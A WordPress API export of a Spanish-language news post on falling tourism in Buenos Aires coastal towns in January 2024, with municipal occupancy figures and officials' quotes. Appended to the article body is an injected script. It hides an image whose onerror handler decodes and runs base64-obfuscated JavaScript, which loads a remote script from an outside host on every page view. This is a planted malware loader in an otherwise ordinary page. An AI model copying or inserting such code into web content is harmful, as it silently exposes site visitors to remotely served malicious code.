{"id":7818,"date":"2024-01-17T15:12:31","date_gmt":"2024-01-17T18:12:31","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=7818"},"modified":"2025-08-13T15:48:25","modified_gmt":"2025-08-13T18:48:25","slug":"los-municipios-costeros-bonaerenses-admitieron-una-merma-en-el-turismo","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=7818","title":{"rendered":"Los municipios costeros bonaerenses admitieron una merma en el turismo"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-text-color has-link-color wp-elements-fe28d6857da344983ff5c594ee93eb24\" style=\"color:#066196\"><em>Los funcionarios de los destinos m\u00e1s convocantes explicaron a T\u00e9lam que los picos m\u00e1s importantes de afluencia tur\u00edstica se dan durante los fines de semana dado que mucha gente \u00abelige venir de viernes a domingo y pasar unos d\u00edas de vacaciones\u00bb.<\/em><\/h3>\n\n\n\n<p>Autoridades del sector tur\u00edstico de localidades de la costa bonaerense admitieron que esta temporada de verano comenz\u00f3 con \u00abuna merma\u00bb de visitantes respecto a a\u00f1os anteriores pero se\u00f1alaron que con el crecimiento que hubo en la segunda quincena se \u00abest\u00e1 cumpliendo con las expectativas\u00bb de un verano \u00abat\u00edpico\u00bb signado por la situaci\u00f3n econ\u00f3mica.<\/p>\n\n\n\n<p>Consultados por<strong>&nbsp;T\u00e9lam<\/strong>, funcionarios de&nbsp;<strong>Pinamar<\/strong>, del partido de La Costa,&nbsp;<strong>Necochea<\/strong>,&nbsp;<strong>Mar Chiquita<\/strong>,<strong>&nbsp;Mar del Plata&nbsp;<\/strong>y General Alvarado coincidieron en que los picos m\u00e1s importantes de afluencia tur\u00edstica se dan durante los fines de semana dado que&nbsp;<strong>mucha gente \u00abelige venir de viernes a domingo y pasar unos d\u00edas de vacaciones\u00bb.<\/strong><\/p>\n\n\n\n<p>El director de Turismo de Pinamar,&nbsp;<strong>Pablo Rodr\u00edguez<\/strong>, explic\u00f3 a esta agencia que el&nbsp;<strong>Observatorio Tur\u00edstico y Econ\u00f3mico<\/strong>&nbsp;de la comuna \u00abrelev\u00f3 un 84% de ocupaci\u00f3n hotelera para esta primera quincena de enero\u201d.<\/p>\n\n\n\n<p>\u201cEn la localidad de Caril\u00f3 alcanz\u00f3 el 96% de ocupaci\u00f3n, Ostende el 86%, Valeria del Mar 81% y Pinamar 76%\u201d, precis\u00f3.<\/p>\n\n\n\n<p>El funcionario enfatiz\u00f3 que \u201ces realmente un orgullo que tantas familias nos sigan visitando para construir sus recuerdos m\u00e1s lindos a pesar de la situaci\u00f3n econ\u00f3mica que nos afecta a todos\u201d.<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u201cEn la localidad de Caril\u00f3 alcanz\u00f3 el 96% de ocupaci\u00f3n, Ostende el 86%, Valeria del Mar 81% y Pinamar 76%\u201dPablo Rodr\u00edguez<\/p>\n<\/blockquote>\n\n\n\n<p>El secretario de Turismo del partido de la Costa,&nbsp;<strong>Guillermo Favale<\/strong>, afirm\u00f3 que transcurridos los primeros d\u00edas de enero,&nbsp;<strong>\u00abla temporada es de regular a buena, y est\u00e1 cumpliendo con las expectativas\u00bb&nbsp;<\/strong>en las 14 localidades que conforman este tradicional destino bonaerense.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" src=\"https:\/\/www.telam.com.ar\/thumbs\/bluesteel\/advf\/imagenes\/2023\/12\/656f816ca26f9_1200.jpg\" alt=\"\" \/><figcaption class=\"wp-element-caption\"><br><em>En Pinamar, hubo un 84% de ocupaci\u00f3n hotelera para esta primera quincena de enero.<\/em><\/figcaption><\/figure>\n<\/div>\n\n\n<p>\u00abPor ejemplo, en la hoteler\u00eda, si hacemos la medici\u00f3n actual en la \u00faltima semana tuvo una ocupaci\u00f3n del 53%. Si la comparamos con el a\u00f1o anterior,<strong>&nbsp;estamos hablando de la primera semana de enero era del 91%, por lo que tenemos una merma del 38%<\/strong>\u00bb detall\u00f3, al basarse en registros oficiales del municipio, los cuales marcan que en las caba\u00f1as la ocupaci\u00f3n es total.<\/p>\n\n\n\n<p>En el caso de Mar del Plata , el director del Ente Municipal de Turismo y Cultura,<strong>&nbsp;Bernardo Martin<\/strong>, dijo que&nbsp;<strong>\u201cfueron en total 666.083 las personas que eligieron la ciudad en la primera quincena del a\u00f1o\u201d<\/strong>.<\/p>\n\n\n\n<p><strong>\u201cLa cifra representa un 5,7 por ciento menos que el arranque de enero en 2023, cuando el n\u00famero de turistas fue de 706.175<\/strong>\u201d, puntualiz\u00f3.<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u201cLa primera quincena tuvimos una ocupaci\u00f3n promedio del 72% y debido a la situaci\u00f3n econ\u00f3mica de la Argentina los comercios tienen una merma en sus ventas que va del 25 % al 40%\u201dAlejandro Frezzia<\/p>\n<\/blockquote>\n\n\n\n<p>Por su parte, el secretario de Turismo de&nbsp;<strong>Mar Chiquita<\/strong>,&nbsp;<strong>Diego Ginestra<\/strong>, se\u00f1al\u00f3 que \u201c<strong>la primera semana del a\u00f1o la comenzamos con una ocupaci\u00f3n del 70 % y ya la segunda creci\u00f3 a un 75%\u201d<\/strong>.<\/p>\n\n\n\n<p>\u201cEn los espect\u00e1culos, restaurantes y bares se nota mucha merma debido a la situaci\u00f3n econ\u00f3mica del pa\u00eds. Son vacaciones muy austeras donde la gente baja a la playa con sus viandas y hay muy poca afluencia de publico en locales gastron\u00f3micos\u201d, agreg\u00f3.<\/p>\n\n\n\n<p>El secretario de Turismo de&nbsp;<strong>General Alvarado<\/strong>,&nbsp;<strong>Alejandro Frezzia<\/strong>, sostuvo que \u201cla primera quincena tuvimos una ocupaci\u00f3n promedio del 72% y debido a la situaci\u00f3n econ\u00f3mica de la Argentina los comercios tienen una merma en sus ventas que va del 25 % al 40%\u201d.<\/p>\n\n\n\n<p>\u201cEn esta segunda quincena ya contamos con una mejor ocupaci\u00f3n del 75% con picos los fines de semana del 90% ya que la gente elije venir de viernes a domingo y as\u00ed pasar unos d\u00edas de vacaciones en el contexto socioecon\u00f3mico que estaos viviendo \u201c remarc\u00f3 desde Miramar.<\/p>\n\n\n\n<p class=\"has-text-align-center\"><strong><em><mark class=\"has-inline-color has-vivid-cyan-blue-color\">\u201cEn los espect\u00e1culos, restaurantes y bares se nota mucha merma debido a la situaci\u00f3n econ\u00f3mica del pa\u00eds. Son vacaciones muy austeras \u00abDiego Ginestra<\/mark><\/em><\/strong><\/p>\n\n\n\n<p>El secretario de Turismo de Necochea,\u00a0<strong>Mat\u00edas Sierra<\/strong>, dijo que \u201c<strong>es una temporada especial y at\u00edpica donde las medidas tomadas en Naci\u00f3n no ayudaron mucho a lo que ven\u00edamos trabajando<\/strong>, donde hemos pasado de ocupaciones del 90 a 95 por ciento en a\u00f1os anteriores a tener hoy entre el 70 a 75 por ciento\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/www.telam.com.ar\/notas\/202401\/652742-turismo-caida-costa-bonaerense.html\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"1024\" height=\"103\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-1024x103.jpeg\" alt=\"\" class=\"wp-image-7468\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-1024x103.jpeg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-300x30.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-768x77.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-696x70.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-320x32.jpeg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-480x48.jpeg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-800x80.jpeg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_.jpeg 1067w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><figcaption class=\"wp-element-caption\">Fuente:<\/figcaption><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Los funcionarios de los destinos m\u00e1s convocantes explicaron a T\u00e9lam que los picos m\u00e1s importantes de afluencia tur\u00edstica se dan durante los fines de semana dado que mucha gente \u00abelige venir de viernes a domingo y pasar unos d\u00edas de vacaciones\u00bb. Autoridades del sector tur\u00edstico de localidades de la costa bonaerense admitieron que esta temporada [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":7819,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11],"tags":[],"class_list":["post-7818","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-buenos-aires"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7818","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7818"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7818\/revisions"}],"predecessor-version":[{"id":10230,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7818\/revisions\/10230"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/7819"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7818"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7818"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7818"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}